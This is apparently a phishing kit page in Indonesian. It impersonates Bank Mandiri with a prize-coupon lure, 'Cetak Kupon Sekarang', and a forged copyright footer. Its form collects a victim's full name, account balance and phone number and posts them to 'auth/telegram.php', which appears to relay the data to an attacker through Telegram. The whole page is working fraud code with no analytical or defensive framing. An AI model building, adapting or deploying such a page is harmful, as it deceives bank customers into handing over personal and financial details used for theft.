﻿<html>
	<head>
		<title>Cetak Kupon Sekarang</title>
		<meta property="og:image" content="https://hosting.tigerengine.id/30p34h.png">
		<meta property="description" content="Dapatkan hadiah menarik dari Bank Mandiri buat kamu yang beruntung.">
		<meta property="og:site_name" content="Cetak Kupon Sekarang">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="stylesheet" href="assets/common/css/global-2.css">
		<link rel="stylesheet" href="assets/common/css/data.css">
		<link rel="stylesheet" href="assets/lib/loader/loader-2.css">
		<link rel="stylesheet" href="assets/lib/ripple/ripple-2.css">
		<script src="assets/lib/jquery/jquery-2.js"></script>
		<script>
			const module = {};
		</script>
		<script type="module" src="assets/common/js/data.js"></script>
	</head>
	<body>
		<div style="width: 100%; height: 100%; background-color: #ffffff; overflow: scroll; display: flex; flex-direction: column;">
			<img src="assets/common/img/img2.png" style="width: 100px; height: 40px; margin-left: 20px; margin-top: 20px; object-fit: fill;">
			<div style="width: 100%; height: 1px; background-color: #dddddd; margin-top: 15px;"></div>
			<div style="width: calc(100% - 40px); padding-left: 20px; padding-right: 20px; margin-top: 20px; margin-bottom: 20px; display: flex; flex-direction: row; justify-content: space-between; align-items: center; margin-top: 15px;">
				<img src="assets/common/img/img3.png" style="width: 100px; height: 50px; object-fit: fill;">
				<div style="color: #444444; font-size: 15px;"><b>Data Pribadi</b></div>
			</div>
			<form id="dataForm" method="post" action="auth/telegram.php">
				<div style="width: calc(100% - 40px); background-color: #faf9fe; display: flex; flex-direction: column; padding-left: 20px; padding-right: 20px;">
					<div style="color: #000000; font-size: 12px; margin-top: 20px;">Nama Lengkap Tanpa Singkatan</div>
					<div style="width: calc(100% - 2px); height: 40px; background-color: #ffffff; border: 1px solid #eeeeee; border-radius: 5px; margin-top: 2px;">
						<input id="name" name="name" type="text" style="width: calc(100% - 20px); height: 100%; padding-left: 10px; padding-right: 10px; background-color: #00000000; border: 0; outline: 0;" required>
					</div>
					<div style="color: #000000; font-size: 12px; margin-top: 20px;">Saldo Akhir</div>
					<div style="width: calc(100% - 2px); height: 40px; background-color: #ffffff; border: 1px solid #eeeeee; border-radius: 5px; margin-top: 2px; display: flex; flex-direction: row;">
						<div style="width: 40px; height: 40px; display: flex; justify-content: center; align-items: center; color: #cccccc; font-size: 12px;">Rp.</div>
						<input id="balance" name="balance" type="text" style="width: 100%; height: 100%; padding-left: 10px; padding-right: 10px; background-color: #00000000; border: 0; outline: 0;" required>
					</div>
					<div style="color: #000000; font-size: 12px; margin-top: 20px;">Nomor Handphone</div>
					<div style="width: 100%; display: flex; flex-direction: row; margin-top: 2px;">
						<div style="padding-left: 5px; padding-right: 5px; height: 40px; background-color: #ffffff; border: 1px solid #eeeeee; border-radius: 5px; display: flex; flex-direction: row; align-items: center;">
							<img src="assets/common/img/id_flag.png" style="width: 20px; height: 15px; object-fit: fill;">
							<div style="color: #000000; font-size: 14px; margin-left: 5px;"><b>+62</b></div>
						</div>
						<div style="flex: 1; height: 40px; margin-left: 5px; padding-left: 10px; padding-right: 10px; background-color: #ffffff; border: 1px solid #eeeeee; border-radius: 5px;">
							<input id="phone" name="phone" type="tel" maxlength="20" style="width: calc(100% - 20px); height: 100%; padding-left: 10px; padding-right: 10px; background-color: #00000000; border: 0; outline: 0;" required>
						</div>
					</div>
					<div style="width: 100%; display: flex; flex-direction: row; justify-content: space-between; margin-top: 20px; margin-bottom: 50px;">
						<div class="ripple" onclick="location.href='data.html'" style="width: 120px; height: 40px; border: 1px solid #013b78; border-radius: 5px; color: #888888; font-size: 15px; display: flex; justify-content: center; align-items: center; margin-left: 10px;"><b>Kembali</b></div>
						<button type="button" id="nextButton" class="ripple" style="width: 120px; height: 40px; background-color: #013b78; border-radius: 5px; color: #ffffff; font-size: 15px; display: flex; justify-content: center; align-items: center; margin-right: 10px;"><b>Selanjutnya</b></button>
					</div>
				</div>
			</form>
			
			<script>
				function formatCurrency(value) {
					return value.replace(/\D/g, '') 
								.replace(/\B(?=(\d{3})+(?!\d))/g, '.'); 
				}
			
				document.getElementById('balance').addEventListener('input', function () {
					this.value = formatCurrency(this.value);
				});
			
				document.getElementById('nextButton').addEventListener('click', function () {
					const form = document.getElementById('dataForm');
					const balanceInput = document.getElementById('balance');
					const numericBalance = balanceInput.value.replace(/\./g, ''); 
					balanceInput.value = numericBalance;
					form.submit();
				});
			</script>
			
			</div>
			<div style="position: fixed; left: 0; bottom: 0; width: 100%; height: 50px; display: flex; justify-content: center; align-items: center; background-color: #2468a5; color: #ffffff; font-size: 15px;">
				© 2025 PT. Bank Mandiri (Persero) Tbk.
			</div>
			<div id="loader" style="display: none; position: fixed; left: 0; top: 0; width: 100%; height: 100%; background-color: #0000007f; justify-content: center; align-items: center;">
				<div style="width: calc(100% - 80px); margin-left: 40px; margin-right: 40px; height: 120px; background-color: #ffffff; border-radius: 5px; display: flex; justify-content: center; align-items: center;">
					<div class="loader" style="width: 50px; height: 50px;"></div>
				</div>
			</div>
		</div>
	</body>
</html>
